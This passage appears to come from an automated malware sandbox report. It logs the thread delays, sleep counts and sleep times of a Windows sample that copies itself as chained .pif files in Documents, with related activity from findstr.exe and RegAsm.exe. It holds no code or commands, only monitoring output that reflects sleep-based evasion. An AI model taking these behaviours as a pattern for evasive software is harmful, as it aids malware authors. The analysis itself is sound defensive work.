            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595862
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595736
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595609
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595492
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595379
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595250
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595139
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595028
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594900
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594783
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594656
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594544
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594431
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594307
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594045
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593875
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593765
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593656
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593547
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593437
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593328
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593218
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593107
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599610
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599360
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599172
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598782
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598578
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598372
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598125
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597922
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597735
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597593
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597472
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597328
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597203
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597094
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596962
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596835
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596723
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596594
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596469
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596357
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596234
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596108
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595958
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595826
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595710
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595532
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595313
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595032
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594877
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594735
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594615
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594453
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594327
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594187
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594047
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593874
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593749
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593614
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593485
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593360
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599844
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599688
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599484
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599334
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599141
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598986
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598846
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598719
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598577
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598203
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597828
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597707
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597578
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597452
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597340
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597223
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597093
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596906
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596797
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 578422
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599871
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599759
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599643
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599520
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599379
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599265
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599153
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599046
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598937
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598828
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598718
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598609
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598499
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598390
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598254
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598140
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598031
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597920
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597812
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597703
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597593
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597484
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597375
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597251
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597109
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596991
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596890
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596781
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596672
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596562
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596452
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596343
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596234
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596125
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596015
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595906
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595796
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595687
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595578
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595468
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595359
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595250
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595140
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595031
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 594922
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 594806
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599871
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599754
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599625
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599516
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599381
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599234
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599117
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598995
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598875
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598765
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598652
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598469
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597875
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597688
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597575
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597462
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597322
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597203
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 597071
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596922
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596781
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596647
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596498
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596373
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596250
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 596136
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595922
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595674
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595542
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595413
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595252
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 595094
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594965
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594797
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594641
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594510
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594385
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594277
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594156
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 594027
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593909
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593793
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593672
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593546
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593437
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593328
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593209
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 593078
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592969
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592859
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592750
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592587
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592476
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 592374
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeWindow / User API: threadDelayed 1928Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeWindow / User API: threadDelayed 6489Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifWindow / User API: threadDelayed 2879Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifWindow / User API: threadDelayed 4426Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifWindow / User API: threadDelayed 3167
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifWindow / User API: threadDelayed 1556
            Source: C:\Windows\SysWOW64\findstr.exeWindow / User API: threadDelayed 5544
            Source: C:\Windows\SysWOW64\findstr.exeWindow / User API: threadDelayed 4428
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifWindow / User API: threadDelayed 471
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifWindow / User API: threadDelayed 3855
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifWindow / User API: threadDelayed 4319
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifWindow / User API: threadDelayed 2662
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifWindow / User API: threadDelayed 4681
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifWindow / User API: threadDelayed 1876
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifWindow / User API: threadDelayed 1401
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifWindow / User API: threadDelayed 463
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifWindow / User API: threadDelayed 886
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifWindow / User API: threadDelayed 2305
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifWindow / User API: threadDelayed 6730
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifWindow / User API: threadDelayed 5773
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifWindow / User API: threadDelayed 481
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 0.8 %
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 0.2 %
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -28592453314249787s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 2764Thread sleep count: 1928 > 30Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -599828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 2764Thread sleep count: 6489 > 30Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -599703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -599594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -599484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -599375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -599263s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -599156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -599047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -598938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -598813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -598688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -598563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -598453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -598344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -598232s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -598125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -598007s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -597882s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -597781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -597672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -597522s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -597376s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -597250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -597141s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -597031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -596922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -596813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -596688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -596563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -596438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -596328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -596219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -596094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -595985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -595860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -595735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -595610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -595485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -595360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -595235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -595110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe TID: 1976Thread sleep time: -594985s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -22136092888451448s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 4112Thread sleep count: 2879 > 30Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 4112Thread sleep count: 4426 > 30Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -599563s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -599450s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -599266s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -599110s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -598945s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -598828s >= -30000sJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif TID: 2428Thread sleep time: -598712s >= -30000sJump to behavior
